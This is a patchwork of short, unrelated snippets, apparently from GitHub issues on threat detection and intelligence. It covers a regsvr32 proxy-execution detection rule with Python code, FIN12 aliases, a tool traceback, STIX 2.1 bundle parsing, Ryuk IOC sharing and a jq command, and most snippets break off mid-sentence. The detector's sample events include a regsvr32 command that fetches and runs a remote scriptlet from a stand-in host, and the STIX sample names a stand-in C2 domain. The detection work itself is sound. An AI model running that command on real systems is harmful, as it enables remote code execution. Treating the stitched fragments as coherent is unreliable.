-
## Description
`regsvr32.exe` making external network connections, as well as `regsvr32.exe` executing with no command-line options, can help detect signed-binary proxy execution (MITRE ATT&CK T1218.010, a defense-evasion technique): the binary is trusted and signed, so adversaries use it to load and run scriptlets or DLLs from remote locations, and a copy launched with no arguments is a common sign of process injection or hollowing.
This rule will detect when `re…
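The two conditions described above, as an added example that is not part of the rule or its repository. It runs over a handful of constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection; these are not real telemetry). The internal CIDR list and the `evaluate` helper are assumptions of this example, not the rule's own logic.

```python
import ipaddress
import re

# Assumed internal ranges (RFC 1918, loopback, link-local). Replace these with
# your organisation's CIDRs; anything outside them counts as "external" here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed Sysmon-style events (not real telemetry). Field names follow
# Sysmon's: Image, CommandLine (EventID 1) and DestinationIp (EventID 3).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'"C:\Windows\System32\regsvr32.exe" /s /i:http://203.0.113.5/a.sct scrobj.dll'},
    {"EventID": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\regsvr32.exe"'},
    {"EventID": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationIp": "10.0.0.12", "DestinationPort": 445},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.dll"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

# A command-line token is either a double-quoted string (may contain spaces)
# or a run of non-whitespace characters.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def image_name(image):
    """Return the lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_regsvr32(image):
    return image_name(image) == "regsvr32.exe"


def has_no_options(command_line):
    """True when the command line is only the program itself (quoted or not)."""
    return len(_TOKEN.findall(command_line.strip())) <= 1


def is_external(ip):
    """True for a syntactically valid address outside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def evaluate(events):
    """Apply both conditions; return (rule_name, event) pairs in input order."""
    alerts = []
    for ev in events:
        if not is_regsvr32(ev.get("Image", "")):
            continue
        if ev.get("EventID") == 3 and is_external(ev.get("DestinationIp", "")):
            alerts.append(("regsvr32_external_network_connection", ev))
        elif ev.get("EventID") == 1 and has_no_options(ev.get("CommandLine", "")):
            alerts.append(("regsvr32_execution_without_options", ev))
    return alerts


if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(name, ev.get("CommandLine") or ev.get("DestinationIp"))
```

Two points worth noting when porting this to a SIEM: the network condition only fires if Sysmon (or the EDR) actually logs network connections for `regsvr32.exe`, so confirm the sensor configuration before trusting the absence of alerts; and the first sample event (`/i:http://...` with `scrobj.dll`) is deliberately not matched by either condition, since it is the job of a separate command-line rule, while the network connection it produces is what the first condition catches.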
-
UNC1878/TEMP.MixMaster (FireEye)
White Magician (PwC)
FIN12 (Mandiant)
ITG23 (IBM)
Team9 (NCC Group)
-
The following issue aims to run the specified test for the current release candidate, report the results, and open new issues for any encountered errors.
## Modules tests information
|||
|-------…
-
This is the error I get when trying to run `python dettect.py generic -ds`
```
Traceback (most recent call last):
File "dettect.py", line 353, in <module>
_menu(_init_menu())
File "dettect.py",…
-
Run on Ubuntu 20.04 using WeasyPrint 53.3:
```
from weasyprint import HTML
HTML('https://www.darkreading.com/attacks-breaches/rapid-ryuk-ransomware-attack-group-christened-as-fin12').write_pdf('test.p…
-
Hello,
do you know where I can try more examples to load and try?
I found these STIX 2.1 Threat Reports
https://oasis-open.github.io/cti-documentation/examples/example_json/apt1.json
https://oasis…
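Loading a STIX 2.1 bundle like the ones linked in the question, as an added example that is not from the project or from the OASIS example files. The bundle below is constructed for this example (the actor, malware, indicator and their IDs are invented); the pattern parser is a deliberately small regex that handles simple comparison patterns only, not the full STIX patterning grammar.

```python
import json
import re

# Constructed STIX 2.1 bundle (not one of the OASIS examples). IDs, names and
# observables are invented for this example.
SAMPLE_BUNDLE = """{
  "type": "bundle",
  "id": "bundle--0b5d8a2e-9f47-4c3a-8e21-3f2a1c9d7e10",
  "objects": [
    {"type": "threat-actor", "spec_version": "2.1",
     "id": "threat-actor--11111111-1111-4111-8111-111111111111",
     "created": "2021-10-01T00:00:00.000Z", "modified": "2021-10-01T00:00:00.000Z",
     "name": "Example Actor"},
    {"type": "malware", "spec_version": "2.1",
     "id": "malware--22222222-2222-4222-8222-222222222222",
     "created": "2021-10-01T00:00:00.000Z", "modified": "2021-10-01T00:00:00.000Z",
     "name": "Example Loader", "is_family": true},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--33333333-3333-4333-8333-333333333333",
     "created": "2021-10-01T00:00:00.000Z", "modified": "2021-10-01T00:00:00.000Z",
     "pattern_type": "stix", "valid_from": "2021-10-01T00:00:00Z",
     "pattern": "[domain-name:value = 'c2.example.net' OR ipv4-addr:value = '203.0.113.5']"},
    {"type": "relationship", "spec_version": "2.1",
     "id": "relationship--44444444-4444-4444-8444-444444444444",
     "created": "2021-10-01T00:00:00.000Z", "modified": "2021-10-01T00:00:00.000Z",
     "relationship_type": "indicates",
     "source_ref": "indicator--33333333-3333-4333-8333-333333333333",
     "target_ref": "malware--22222222-2222-4222-8222-222222222222"},
    {"type": "relationship", "spec_version": "2.1",
     "id": "relationship--55555555-5555-4555-8555-555555555555",
     "created": "2021-10-01T00:00:00.000Z", "modified": "2021-10-01T00:00:00.000Z",
     "relationship_type": "uses",
     "source_ref": "threat-actor--11111111-1111-4111-8111-111111111111",
     "target_ref": "malware--22222222-2222-4222-8222-222222222222"}
  ]
}"""

# Matches "object-path = 'value'" comparisons inside a STIX pattern, e.g.
# domain-name:value = 'c2.example.net'. Boolean operators and other
# comparison operators are intentionally not handled.
_COMPARISON = re.compile(r"([a-z0-9-]+:[^\s=]+)\s*=\s*'((?:[^'\\]|\\.)*)'")


def load_bundle(text):
    """Parse a STIX 2.1 bundle; return a dict mapping object id -> object.

    Raises ValueError if the top-level object is not a bundle or if any
    contained object lacks an id/type or is not marked spec_version 2.1.
    """
    data = json.loads(text)
    if data.get("type") != "bundle":
        raise ValueError("top-level object is not a STIX bundle")
    objects = {}
    for obj in data.get("objects", []):
        if "id" not in obj or "type" not in obj:
            raise ValueError("object without id/type in bundle")
        if obj.get("spec_version") != "2.1":
            raise ValueError("object %s is not STIX 2.1" % obj["id"])
        objects[obj["id"]] = obj
    return objects


def related_ids(objects, obj_id, relationship_type, inbound=False):
    """Follow SROs of one type out of (or, with inbound=True, into) obj_id."""
    ids = []
    for o in objects.values():
        if o["type"] != "relationship" or o.get("relationship_type") != relationship_type:
            continue
        if inbound and o["target_ref"] == obj_id:
            ids.append(o["source_ref"])
        elif not inbound and o["source_ref"] == obj_id:
            ids.append(o["target_ref"])
    return ids


def extract_observables(pattern):
    """Return (object_path, value) pairs from simple equality comparisons."""
    return _COMPARISON.findall(pattern)


def iocs_for_actor(objects, actor_id):
    """actor -uses-> malware <-indicates- indicator, flattened to observables."""
    iocs = []
    for malware_id in related_ids(objects, actor_id, "uses"):
        for ind_id in related_ids(objects, malware_id, "indicates", inbound=True):
            iocs.extend(extract_observables(objects[ind_id]["pattern"]))
    return iocs


if __name__ == "__main__":
    objs = load_bundle(SAMPLE_BUNDLE)
    for path, value in iocs_for_actor(objs, "threat-actor--11111111-1111-4111-8111-111111111111"):
        print(path, value)
```

The same `load_bundle` works on the OASIS example files after downloading them, with one caveat: `apt1.json` and some other published examples are STIX 2.0 (objects carry no `spec_version`), so the 2.1 check above rejects them by design; relax it if you want to mix versions.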
-
As an example I have probably investigated 50-100 Ryuk ransomware attacks now, each one we get new IOCs as well as see a lot of the old ones again. Having to remember what IOCs to look for seems mad. …
-
Based off my idea in #42; tested by @pallebone.
```bash
jq -rj 'to_entries[] | select(.value.color == "black") | .value.mirrors | join (" "), " "'
```
Make a release step to print `mirrors[0]` f…
-
Hi, as I told you, here's my list on Ryuk/Bazar/Trickbot
Choose what you want to add to yours.
Thanks for your work, David and much thanks to all the companies / individuals sharing intel on these.
…